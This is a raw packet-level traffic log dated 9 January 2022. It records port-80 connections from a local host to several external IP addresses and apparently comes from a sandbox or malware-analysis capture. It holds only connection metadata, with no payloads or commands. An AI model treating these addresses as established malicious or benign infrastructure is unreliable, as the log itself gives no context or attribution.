Jan 9, 2022 18:48:29.584445953 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.584455967 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.584485054 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.584518909 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.585315943 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.585354090 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.585393906 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.585413933 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.585433960 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.585472107 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.585473061 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.585549116 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.586303949 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.586344004 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.586383104 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.586421967 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.586451054 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.586532116 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.587254047 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.587425947 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.587466955 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.587490082 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.587505102 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.587546110 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.587570906 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.588304043 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.588346004 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.588383913 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.588387012 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.588422060 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.588462114 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.588476896 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.588536978 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.589346886 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.589389086 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.589425087 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.589463949 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.589483976 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.589504957 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.589535952 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.590318918 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.590362072 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.590387106 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.590400934 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.590444088 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.590464115 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.590483904 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.590544939 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.591285944 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.591397047 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.591434956 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.591474056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.591479063 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.591567039 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.592276096 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.592317104 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.592355013 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.592390060 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.592394114 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.592457056 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.592464924 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.593293905 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.593334913 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.593369007 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.593377113 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.593466997 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.594820023 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.758418083 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.995824099 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.179280996 CET	80	49848	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:30.179450035 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.179505110 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.179514885 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.362620115 CET	80	49848	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:30.837789059 CET	80	49848	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:30.837836027 CET	80	49848	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:30.837932110 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.837982893 CET	49848	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:30.951008081 CET	49849	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:30.970730066 CET	80	49849	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:30.971002102 CET	49849	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:30.971236944 CET	49849	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:30.990808964 CET	80	49849	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:30.990859032 CET	80	49849	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:31.020535946 CET	80	49848	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:31.031969070 CET	49849	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:31.041080952 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:31.282989979 CET	80	49850	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:31.283181906 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:31.283220053 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:31.283230066 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:31.527117014 CET	80	49850	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:32.323358059 CET	80	49850	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:32.323483944 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.323487043 CET	80	49850	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:32.323539972 CET	49850	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.370270967 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.388354063 CET	80	49787	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:32.388514996 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.390842915 CET	49853	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.408536911 CET	80	49853	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:32.408668995 CET	49853	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.408732891 CET	49853	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.426656961 CET	80	49853	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:32.426717043 CET	80	49853	54.38.220.85	192.168.2.3
Jan 9, 2022 18:48:32.451920986 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.469548941 CET	49853	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:48:32.565356016 CET	80	49850	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:32.693371058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:32.693494081 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.693598032 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.693628073 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:32.935172081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:33.998199940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:33.998267889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:33.998456955 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.239877939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.239948034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.240000010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.240050077 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.240170002 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.240267038 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.481641054 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481719017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481770992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481822014 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481837034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.481873989 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481889963 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.481925964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.481976986 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.481977940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.482029915 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.482079029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.723495960 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.723587990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.723639965 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.723670006 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725004911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725038052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725069046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725071907 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725092888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725122929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725131989 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725147009 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725162029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725167990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725198984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725219965 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725222111 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725245953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725261927 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.725274086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725294113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.725327015 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.766675949 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967134953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967278004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967329025 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967382908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967387915 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967436075 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967484951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967487097 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967540979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967566967 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967593908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967644930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967672110 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967700005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967751026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967768908 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967802048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967853069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967868090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.967904091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967955112 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.967992067 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968005896 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968056917 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968092918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968106985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968158007 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968202114 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968209028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968261957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968286037 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968313932 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968364954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968384981 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968415022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968461037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968488932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968514919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968564987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968599081 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968616962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968667984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968688965 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:34.968719006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:34.968806982 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210195065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210453987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210508108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210561037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210611105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210642099 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210659027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210690022 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210711002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210753918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210762024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210813046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210846901 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210863113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210912943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.210946083 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.210963011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211013079 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211049080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211061001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211112022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211133957 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211160898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211211920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211231947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211262941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211313963 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211335897 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211364031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211415052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211442947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211467028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211518049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211539030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211566925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211616993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211646080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211658001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211707115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211743116 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.211745024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.211821079 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.494287968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494365931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494421959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494476080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494528055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494581938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494633913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494645119 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.494688034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494697094 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.494744062 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494796991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494797945 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.494848967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494884014 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.494904995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494957924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.494993925 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495009899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495063066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495080948 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495115042 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495167017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495208025 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495218039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495270967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495312929 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495322943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495376110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495397091 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495429039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495481014 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495521069 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495534897 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495585918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495621920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495639086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495691061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495722055 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.495744944 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.495816946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757160902 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757231951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757282972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757307053 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757333040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757384062 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757399082 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757433891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757483959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757489920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757543087 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757601023 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757601976 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757656097 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757704973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757707119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757759094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757810116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757817984 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757862091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757913113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.757915974 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.757966995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758018970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758059025 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.758063078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758115053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758115053 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.758164883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758208036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:35.758222103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:35.797950029 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.020740986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.020812035 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.020878077 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.020891905 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.020945072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.020992994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021006107 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021033049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021063089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021099091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021155119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021193027 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021205902 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021220922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021256924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021256924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021308899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021357059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021362066 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021408081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021456957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:36.021459103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:36.021506071 CET	80	49854	211.169.6.249	192.168.2.3
